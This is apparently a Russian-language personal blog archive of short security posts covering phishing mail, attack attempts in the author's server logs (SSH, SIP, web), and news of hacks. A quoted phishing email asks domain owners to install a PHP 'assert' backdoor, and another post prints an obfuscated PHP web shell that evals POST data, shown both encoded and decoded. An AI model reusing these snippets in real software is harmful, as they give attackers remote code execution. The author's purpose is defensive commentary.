November 2019

S M T W T F S
      12
34 5 678 9
10111213141516
17181920212223
24252627282930

Navigation

Page Summary

Style Credit

Expand Cut Tags

Expand All Cut TagsCollapse All Cut Tags

Пришло письмо, якобы от RU-CENTER

dil: (Default)
Saturday, December 9th, 2017 12:51 pm

Уважаемый администратор домена!

В соответствии с поправками, внесенными в ICANN RAA, Вы должны подтвердить, что фактическое управление доменным именем ***.ru осуществляется лицом, указанным в качестве его администратора.

Чтобы подтвердить, что Вы имеете возможность управлять доменом, создайте в корневой директории сайта файл *****.php со следующим содержимым:

<?php
assert(stripslashes($_REQUEST[RUCENTER]));
?>

Файл должен быть создан в течение трех рабочих дней с момента получения настоящего сообщения и находиться на сервере до 19 августа 2017 года, 15:00 (UTC+03:00), в противном случае процедура активации будет считаться непройденной.

Уведомляем Вас о том, что если процедура подтверждения не будет пройдена, обслуживание домена будет приостановлено.

Письмо я прочитал слишком поздно, а то бы и вправду создал этот файл. Естественно, с другим кодом, чтобы записать, какие запросы эти хакеры в него будут посылать, а не позволять им читать и писать файлы у меня на сервере, и выполнять прочие команды.

Сейчас посмотрел в логи, они и вправду пытались в него зайти вплоть до 19 августа, как и обещали:
13.59.87.172 - - [07/Aug/2017:15:04:08 +0100] "POST /*****.php HTTP/1.1" 404 218 "-" "Mozilla/5.0 (X11; ; Linux i686; rv:1.9.2.20) Gecko/20110805"
13.59.87.172 - - [10/Aug/2017:16:36:36 +0100] "POST /*****.php HTTP/1.1" 404 218 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.13 (KHTML, like Gecko) Chrome/24.0.1290.1 Safari/537.13"
54.215.228.151 - - [19/Aug/2017:12:13:41 +0100] "POST /*****.php HTTP/1.1" 404 218 "-" "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14"

А вот где они украли мой адрес – непонятно, nic.ru в whois про меня ничего не показывает, просто Private person.

Оригинал этой записи в личном блоге.

Tags:

Всюду хакеры..

dil: (Default)
Saturday, September 30th, 2017 01:39 pm

Какой-то идиот опять указал мой почтовый адрес в своём эккаунте, и Инстаграм прислал мне запрос на подтверждение.
Но вот этот адрес самого Инстаграма мгновенно отвергает всякое желание им пользоваться:

P.S. Это не подделка, в натуре прислано из мордокниги:

ExpandRead the rest of this entry » )

Оригинал этой записи в личном блоге.

Tags:

Великий китайский файрвол, говорите??

dil: (Default)
Wednesday, May 24th, 2017 08:12 pm

Да щаз, из Китая столько хакеров выползает.. Вот сейчас внезапно обнаружил, что когда я из дома захожу на сайт www.17track.net, рекомендованный DealExtreme’ом для отслеживания отправленных ими посылок по разным странам, на моём домашнем веб-сервере появляются вот такие запросы:

202.104.118.199 - - [23/May/2017:14:14:39 +0100] "GET http://www.17track.net/restapi/handlertest.ashx HTTP/1.1" 403 401 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)" "-" "www.17track.net"
202.104.118.193 - - [23/May/2017:18:38:36 +0100] "GET http://www.17track.net/restapi/handlertest.ashx HTTP/1.1" 403 401 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)" "-" "www.17track.net"
202.104.118.199 - - [24/May/2017:17:15:55 +0100] "GET http://www.17track.net/restapi/handlertest.ashx HTTP/1.1" 403 401 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)" "-" "www.17track.net"
202.104.118.193 - - [24/May/2017:19:28:55 +0100] "GET http://www.17track.net/restapi/handlertest.ashx HTTP/1.1" 403 401 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)" "-" "www.17track.net"

Формат лога – стандартный апачевский combined, к которому добавлены два поля в конце: Сookie и Host из HTTP-запроса.

Выходит, что они каждый раз проверяют, не зашёл ли я к ним с дырявого прокси-сервера. Потому что запрос с таким полным урлом только им и может обрабатываться.

Оригинал этой записи в личном блоге.

Tags:

Сильно вумные хацкеры

dil: (Default)
Friday, February 12th, 2016 07:10 pm

решили, что на сервере в Ирландии стоит попробовать местные имена. Но не вышло..

Feb 7 07:04:34 sshd[31467]: Failed password for invalid user tara from 31.199.181.6 port 48488 ssh2
Feb 7 07:29:17 sshd[2119]: Failed password for invalid user tiffany from 31.199.181.6 port 35350 ssh2
Feb 7 08:18:43 sshd[8450]: Failed password for invalid user trevor from 31.199.181.6 port 37436 ssh2
Feb 7 08:31:06 sshd[10289]: Failed password for invalid user trisha from 31.199.181.6 port 45012 ssh2
Feb 7 10:47:13 sshd[27208]: Failed password for invalid user zoe from 31.199.181.6 port 44137 ssh2

ExpandRead the rest of this entry » )

Оригинал этой записи в личном блоге.

Tags:

USB-зарядка как источник инфицирования смартфонов

dil: (Default)
Tuesday, June 4th, 2013 10:37 pm

via infowatch:

Товарищи собрали “зарядку”, которая, якобы, будучи подключённой к любому устройству на iOS, может устанавливать туда произвольные программы. Полагаю, что и читать оттуда произвольные данные тоже может. Пока устройство достаточно большое, собрано на BeagleBone, но в принципе нынешние технологии вполне позволяют запихнуть его в один маленький незаметный чип внутри USB-зарядки.

Но фиг бы с ней, с iOS, лично я ей не пользуюсь, а вот аналогичная проблема с Андроидом меня таки беспокоит.

В предыдущем телефоне с ещё вторым Андроидом можно было настроить поведение телефона при подключении к USB: как mass storage device, как usb-ethernet для раздачи мобильного интернета в компьютер или наоборот, для получения интернетов из компьютера, в отладочном режиме (для разработчиков софта), или ещё как-нибудь. У меня по умолчанию был выбран режим “только зарядка”, а всё остальное надо было явно включать вручную на телефоне.

В новом же телефоне с четвёртым андроидом ублюдочный MTP включается автоматически (если только телефон не был предварительно заблокирован). В любом случае, если телефон разблокировать, когда он уже подключён, то MTP тут же включается, и как это поведение изменить — я не нашёл.

Хуже того, у меня постоянно самопроизвольно включается режим USB debugging. Сколько я его ни выключал в Developer options, при подключении к компьютеру по USB он тут же включается обратно. А ведь он позволяет не только читать и писать произвольные данные (хоть и от пользователя, а не от рута), но и устанавливать программы.

И в отличие от вышеупомянутой iOS, даже ломать ничего не надо. Заходи кто хочешь, устанавливай что хочешь.. Как-то оно печально.

Оригинал этой записи в личном блоге.

Tags:

Зачем хакерам SIP-номера?

dil: (Default)
Saturday, February 4th, 2012 12:23 pm

Стоило поставить астериск, как сразу набежали хакеры и стали проверять имеющиеся эккаунты. А там ещё вообще ни одного не было.

Но вот зачем им это?

[Feb  4 08:42:03] NOTICE[19417] chan_sip.c: Registration from '"4264107661"<sip:4264107661@***>' failed for '188.138.112.61' - No matching peer found
[Feb  4 08:42:03] NOTICE[19417] chan_sip.c: Registration from '"887921716"<sip:887921716@***>' failed for '188.138.112.61' - No matching peer found
[Feb  4 08:42:03] NOTICE[19417] chan_sip.c: Registration from '"Administrator"<sip:Administrator@***>' failed for '188.138.112.61' - No matching peer found
[Feb  4 08:42:03] NOTICE[19417] chan_sip.c: Registration from '"100"<sip:100@***>' failed for '188.138.112.61' - No matching peer found
[Feb  4 08:42:03] NOTICE[19417] chan_sip.c: Registration from '"administrator"<sip:administrator@***>' failed for '188.138.112.61' - No matching peer found
[Feb  4 08:42:04] NOTICE[19417] chan_sip.c: Registration from '"admin"<sip:admin@***>' failed for '188.138.112.61' - No matching peerfound
[Feb  4 08:42:04] NOTICE[19417] chan_sip.c: Registration from '"admin1"<sip:admin1@***>' failed for '188.138.112.61' - No matching peer found
[Feb  4 08:42:04] NOTICE[19417] chan_sip.c: Registration from '"101"<sip:101@***>' failed for '188.138.112.61' - No matching peer found
[Feb  4 08:42:04] NOTICE[19417] chan_sip.c: Registration from '"admin12"<sip:admin12@***>' failed for '188.138.112.61' - No matching peer found
[Feb  4 08:42:04] NOTICE[19417] chan_sip.c: Registration from '"102"<sip:102@***>' failed for '188.138.112.61' - No matching peer found
[Feb  4 08:42:04] NOTICE[19417] chan_sip.c: Registration from '"admin123"<sip:admin123@***>' failed for '188.138.112.61' - No matchingpeer found
[Feb  4 08:42:04] NOTICE[19417] chan_sip.c: Registration from '"103"<sip:103@***>' failed for '188.138.112.61' - No matching peer found
[Feb  4 08:42:04] NOTICE[19417] chan_sip.c: Registration from '"admin1234"<sip:admin1234@***>' failed for '188.138.112.61' - No matching peer found
...

Оригинал этой записи в личном блоге.
Любые материалы из этого блога запрещается использовать на сайте livejournal.ru в любой форме и любом объёме.

Tags:

Задумчиво глядя в код

dil: (Default)
Tuesday, June 21st, 2011 07:13 am

<?php eval(base64_decode("aWYoaXNzZXQoJну и т.д.")); ?>

После декодирования оно выглядит так:

if(isset($_GET["part"])) {  if($_GET["part"]=="sec")  echo "partgood"; } else if(isset($_POST["ggg"])) {   if($_POST["ggg"]==1)        echo "ok11";  } else if(isset($_POST["main"])) {  eval(urldecode($_POST["main"])); }

 

Оригинал этой записи. Комментировать можно тут или там.

Любые материалы из этого блога запрещается использовать на сайте livejournal.ru в любой форме и любом объёме

Tags:

Ебизнес

dil: (Default)
Wednesday, April 28th, 2010 08:27 am

Получил сегодня письмо. Бумажное. Некая Domain Renewal Group (www.domainrenewalgroup.com) сообщает о предстоящем окончании оплаченного срока одного из моих доменов и предлагает перевести его к ним.

Недорого предлагают, всего 28 евро в год. Хотя у нынешнего регистратора он стоит 18, и это легко проверяется на его сайте.

Их собственный домен зарегистрирован через другого регистратора – namejuice.com. А дизайн сайта с него добросовестно скопирован. Да и этот namejuice какой-то подозрительный: ссылка про их хостинг ведёт на домен, предлагаемый к продаже.

К письму прилагается форма, в которой предлагается указать номер кредитки.

И конвертик с обратным адресом. В Британии. Телефон службы поддержки – +1-905, это Канада. А само письмо, судя по штемпелю, отправлено с Ямайки.

Для полного счастья Registration Agreement напечатан на обратной стороне письма мелкими буквами серого цвета. Вероятно, в надежде, что его никто читать не будет.

Вот я и думаю – они идиоты или меня таковым считают?

Update: при внимательном рассмотрении штемпеля это оказалась другая Ямайка, которая в Нью-Йорке. По соседству с Queens.

Оригинал этой записи. Комментировать можно тут или там.

Любые материалы из этого блога запрещается использовать на сайте livejournal.ru в любой форме и любом объёме

Tags:

А казалось бы, серьёзные люди, не пионэры какие

dil: (Default)
Friday, January 22nd, 2010 01:40 pm

На крупнейшем ирландском форуме boards.ie второй день красуется надпись о том, что неустановленными лицами извне Ирландии был осуществлён несанкционированный доступ к базе данных логинов, паролей (к счастью, шифрованных) и почтовых адресов пользователей.

В связи с чем форум закрыт на неопределённое время. Интересно, что новости рекомендуют читать не на самом сайте, а на твиттере.

via [info]nikulina

“Today, Thursday 21 Jan 2010 at 11:20 GMT the Boards.ie database was attacked by a source external to Ireland. This triggered our security response policy and as a result we are sending you this warning email.

In this attack, part of the database which includes our members usernames, email addresses and obfuscated passwords was accessed. While our investigations indicate that individual user accounts are not in danger we have taken the step of changing all user passwords.

ExpandRead the rest of this entry » )

Оригинал этой записи. Комментировать можно тут или там.

Любые материалы из этого блога запрещается использовать на сайте livejournal.ru в любой форме и любом объёме

Tags:

Китайские хакеры взломали главный сервер Пентагона..

dil: (Default)
Wednesday, January 20th, 2010 06:09 pm

Мошенники, похитившие платежный терминал из магазина в городе Балаково Саратовской области, сумели перевести на открытые в разных регионах России электронные кошельки около 1 миллиона рублей.

По предварительной версии, они разобрали терминал и прогнали через его купюроприемник одну и ту же тысячерублевую купюру около тысячи раз.

Как справедливо замечает [info]to-the-future, “злоумышленники не имели ни малейшего понятия о шифрованных vpn’ах, которыми защищены транзакции, о скриптах, которыми можно автоматизировать эту операцию”. Им это не понадобилось.

Вот и Брюс Шнайер недавно писал примерно о том же: “Threat modeling is, for the most part, ad hoc. You think about the threats until you can’t think of any more, then you stop. And then you’re annoyed and surprised when some attacker thinks of an attack you didn’t.”

Оригинал этой записи. Комментировать можно тут или там.

Любые материалы из этого блога запрещается использовать на сайте livejournal.ru в любой форме и любом объёме

Tags:

Новости компьютерной безопасности: хак SSL-сертификатов

dil: (Default)
Thursday, July 30th, 2009 04:01 pm

Некорректная обработка нулевого символа в CN позволяет получить честно заверенный сертификат, который будет приниматься за сертификат от чужого домена. Какая лепота..

Подробности

via [ljuser]motto[/ljuser]

Оригинал этой записи в личном блоге.
Любые материалы из этого блога запрещается использовать на сайте livejournal.ru в любой форме и любом объёме.

Tags:

Томские хакеры настолько суровы…

dil: (Default)
Friday, July 24th, 2009 11:04 am

Боян, да. Но я сегодня оригинал откопал. Ознакомьтесь. И в очередной раз сделайте вывод о квалификации журналюг Ленты.

Оригинал этой записи в личном блоге.
Любые материалы из этого блога запрещается использовать на сайте livejournal.ru в любой форме и любом объёме.

Tags:

Из жизни шпионов

dil: (Default)
Saturday, May 23rd, 2009 05:10 pm

Так выглядит защита на персональном компьютере КГБ, которую ломает шведский шпиён:

Остальные картинки под катом

ExpandRead the rest of this entry » )

Оригинал этой записи. Комментировать можно тут или там.

Любые материалы из этого блога запрещается использовать на сайте livejournal.ru в любой форме и любом объёме

Tags:

Куда там Левину с Ситибанком

dil: (Default)
Saturday, February 21st, 2009 07:42 pm
вот они, настоящие российские хакеры: https://vz.ru/society/2009/2/20/258582.html
Tags:

Как известно, китайские хакеры взломали главный сервер Пентагона

dil: (Default)
Wednesday, February 18th, 2009 08:45 am
а вьетнамские хакеры взломали системы распознавания владельца ноутбука по его лицу: Lenovo Veriface III, Asus SmartLogon V1.0.0005, Toshiba Face Recognition 2.0.2.32.

Как? А очень просто: показали им фотографию владельца :)

Какой вывод можно сделать из этой истории? Не надо упускать мелочи. В системах доступа, основанных на распознавании лица, рядом должен стоять живой охранник, который такое читерство сразу обнаружит.

Upd: обсуждение на Slashdot
Tags:

задумчивое

dil: (Default)
Tuesday, November 25th, 2008 01:37 pm
На http://habrahabr.ru/blogs/fun/45329/ ещё вчера было обсуждение взлома сайта ФНС. То есть, взлома, как такового, и не было. Там просто оставили открытый админ-режим с логином admin и таким же паролем, а народ нашёл и начал издеваться.

Но куда пропала страница с хабра? закэшированная версия

Upd: а вот это - сайт Федерального государственного унитарного предприятия Главный научно-исследовательский вычислительный центр Федеральной Налоговой Службы: http://www.gnivc.ru/. Которое занимается разработкой и поддержкой сайтов ФНС. Как справедливо заметили на хабре, у них даже почти все картинки на месте..

Upd2: а вот это - Справочник обозначений налоговых органов для целей учета налогоплательщиков (Справочник СОУН) от 30.10.08:


Upd3: (радостно хлопая в ладоши) ARJ! FTP! Max users logged in!


А эти криворукие уроды, между прочим, получают зарплату из ваших налогов.
Tags:

А этот ваш chip-and-pin нифига не панацея от фрода

dil: (Default)
Saturday, August 30th, 2008 12:54 pm
https://www.rte.ie/news/2008/0818/107055-fraud/

А всё потому, что общение между картой и терминалом совершенно незашифрованное. И соответственно, эти данные вполне можно перехватить и запомнить.

Ну и, конечно, потому что разгильдяи в магазинах даже не почесались позвонить в банк и проверить, что это за люди пришли менять терминал.
Tags:

Плакал горючими слезами

dil: (Default)
Wednesday, August 13th, 2008 07:30 am
"Специалисты американской компании Tulip Systems, занимающейся хостингом интернет-сайта Михаила Саакашвили, с трудом отбивают атаки хакеров. Как передает телеканал "Вести", приводя слова исполняющего обязанности руководителя компании Тома Берлинга, "сейчас ситуацию можно описать как игру в шахматы. Мы принимаем удар, сайт виснет, два часа мы восстанавливаем систему, минут 30-45 сайт работает, потом хакеры снова находят способы сломать его".

Атаки происходят одновременно примерно с 500 адресов. "Все IP-адреса, с которых ведется нападение, находятся в России. Нам удается их блокировать, но, буквально, через пять минут мы снова фиксируем порядка 500 атак уже с других российских адресов", - рассказал Берлинг."

via [livejournal.com profile] pzrk

Как страшно жить. Целых 500 компьютеров. И все из России. Про файрволы cпециалисты американской компании, видимо, никогда не слышали.

Впрочем, это может быть журналистская утка или кривой перевод.

А вот что на явно правительственном сайте http://www.const.gov.ge/ уже минимум второй день висит красивая картинка - это факт.

Upd: кто-нибудь видит http://president.gov.ge/ ? Я - нет.

# tcptraceroute president.gov.ge 80
Selected device eth0, address *.*.*.*, port 43913 for outgoing packets
Tracing the path to president.gov.ge (208.75.229.98) on TCP port 80 (www), 30 hops max
...
4 ie-dub01a-ra3-xe-0-2-0-0.aorta.net (213.46.165.73) 5.312 ms 6.752 ms 6.111 ms
5 at-vie01a-rd1-pos-5-2.aorta.net (213.46.160.89) 19.157 ms 20.466 ms 19.957 ms
6 213.46.174.206 20.147 ms 19.088 ms 19.774 ms
7 ldn-b1-link.telia.net (213.248.78.129) 20.136 ms 21.560 ms 19.835 ms
8 ldn-bb1-link.telia.net (80.91.248.90) 20.174 ms 20.374 ms 20.239 ms
9 ash-bb1-link.telia.net (213.248.65.98) 108.190 ms 108.671 ms 107.733 ms
10 atl-bb1-link.telia.net (80.91.252.122) 121.144 ms 124.607 ms 122.591 ms
11 * * *
12 * * *
13 * * *
Tags:

Взломаны бесконтактные карты от московского метро

dil: (Default)
Sunday, July 6th, 2008 03:56 pm
как сообщают нам френды под замком, это уже не теория, как про лондонские, а вполне реально существующие подделки. Говорят, работающие.
Tags:

А ваш провайдер не подменяет DNS-ответы о несуществующих хостах?

dil: (Default)
Thursday, April 24th, 2008 02:06 pm
https://www.schneier.com/blog/archives/2008/04/hacking_isp_err.html
https://www.theregister.co.uk/2008/04/20/kaminsky_demo_at_toorcon/
https://www.wired.com/2008/04/isps-error-page/
Tags: